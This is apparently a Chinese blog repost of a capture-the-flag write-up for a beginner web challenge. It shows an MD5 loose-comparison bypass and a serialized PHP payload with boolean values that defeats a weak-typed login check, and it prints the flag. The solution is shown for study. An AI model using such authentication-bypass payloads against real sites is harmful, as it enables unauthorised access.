CTF最简单的Web题

最新推荐文章于 2023-05-21 17:59:32 发布
最新推荐文章于 2023-05-21 17:59:32 发布
阅读量1k 收藏 1
点赞数
文章标签: php 前端 ViewUI
原文链接:http://www.cnblogs.com/levelstrcpy/p/9210333.html
版权 
http://www.shiyanbar.com/ctf/1810

天网管理系统
天网你敢来挑战嘛
格式:ctf{ }
解题链接: http://ctf5.shiyanbar.com/10/web1

查看源代码发现提示<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

md5($test) = ‘0’ 

百度0开头的md5值,随便拿一个带进username用就OK了。 

得到一个提示:

/user.php?fame=hjkleffifer

 进入  http://ctf5.shiyanbar.com/10/web1/user.php?fame=hjkleffifer

$unserialize_str = $_POST['password']; 
$data_unserialize = unserialize($unserialize_str); 
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
{ print_r($flag); } 
伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年
把复杂的数据类型压缩到一个字符串中
serialize() 把变量和它们的值编码成文本形式
unserialize() 恢复原先变量
 弱类型,bool的true和任意字符串弱类型相等, 所以构造的user(bool)和password(bool)的值为true即可。 
<?php
$payload = array('user'=>true,'pass' => true);
echo serialize($payload);
?>

  得到

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 user:admin

password: a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 得到

ctf{dwduwkhduw5465}

转载于:https://www.cnblogs.com/levelstrcpy/p/9210333.html

weixin_34167043
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-入门练习
10-30
目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
ctf web基础中简单的思路
qq_61988806的博客
09-12 2676
ctf web中最基本目的类型和做法思路
ctf简单
qq_64553002的博客
05-12 181
bAcon iS a MEaT prodUcT prePared frOm a pig and UsuALLy cUReD. 目名字是bacon,中文翻译就是培根,所以用培根解码。 五个字划一组,重新分组。 bAcon iSaME aTpro dUcTp rePar edfrO mapig andUs uALLy cUReD. 小写换a大写换b得到 abaaa ababb abaaa ababa aabaa aaaab aaaaa aaaba abbba abbab 使用培根解码得到 fla
CTF库超详细资源合集
最新发布
06-14
在传统的CTF线上⽐赛中,Web⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web⽬常见的漏洞类型...
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
CTF100.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF Web各种目的解姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
ctfhub web全部做记录(持续跟新)
01-08
可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b...
CTF web安全经典例讲解
10-22
该内容为CTFweb安全经理例讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种型讲解,图文结合,适合新手学习。
ctf大赛目 格式为图片格式
08-03
ctf比赛的部分目 格式为图片格式 英语 可以上手做联系用................................................................................
简单CTF
weixin_44147777的博客
12-21 2675
1.key 此只需在点开链接后查看原码(按f12)即可得到key
CTF Web简单的SQL注入
RED_散的博客
09-17 927
目链接
CTF日记之web目(入门目)
sunleibaba的博客
01-22 933
CTF日记 今天的目是i春秋ctf中的:“百度杯”CTF比赛 2017 二月场 web 爆破-3 如图所示网页,可以看到是一道代码审计的目: <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'e
webCTF简单解_ONE
huster0828的博客
11-19 665
1. view_source(from 攻防世界) X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 我是用的谷歌浏览器,Ctrl + U 就可以查看源代码 2. robots(from 攻防世界) 目描述是:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 打开网页什么都没有 然后去网上搜一下robots协议是啥 然后就进入了robots.txt这个根目录,出现了这个 又进入f1ag_1s_h3re.php里面,就找到fl
CTF练习— —简单WEB练习,maxlength问
Jum的博客
11-09 2998
日常练脑,好久好久没有打CTF 了虽然不打但是不得不备,日常练脑,别生锈。 拿目 打开WEB环境是一个计算,输上答案,发现只能输1位数字,肯定是限制了。那么需要我们解除输入限制方可得到flag. 找思路 日常习惯F12, 追踪到被限制输入的input。发现果真是限制了以为我们修改一下。 解答 因为我们的答案是141三位,我们把maxlength修改为3。这样我们就可以输入答案了。 输入正确的答案后,点击验证得到flag。夺旗成功。 夺旗成功 输入正确格式的flag.
CTF练习[Crypto]-简单加密
weixin_45246254的博客
01-07 2272
https://ctf.bugku.com/challenges/detail/id/51.html?page=2 拿到目如下 e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA 评论区提示AA为== 编写代码ASCII码前移4位 str1="e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA" li=list(str1) li2=[] for i in li: a=ord(i)-4
CTF
qq_63489512的博客
05-21 1491
第一次参加类似于ctf的比赛赛前准备,以及赛后对目的总结
ctfweb有什么技巧
04-05
作为AI语言模型,我并不会CTF,但以下是一些通用的技巧,可以帮助你在CTFWeb中取得成功: 1. 深入了解HTTP协议和Web应用程序的基础知识,包括Cookie、Session、HTTP请求头和响应头等。 2. 熟悉基本的Web漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值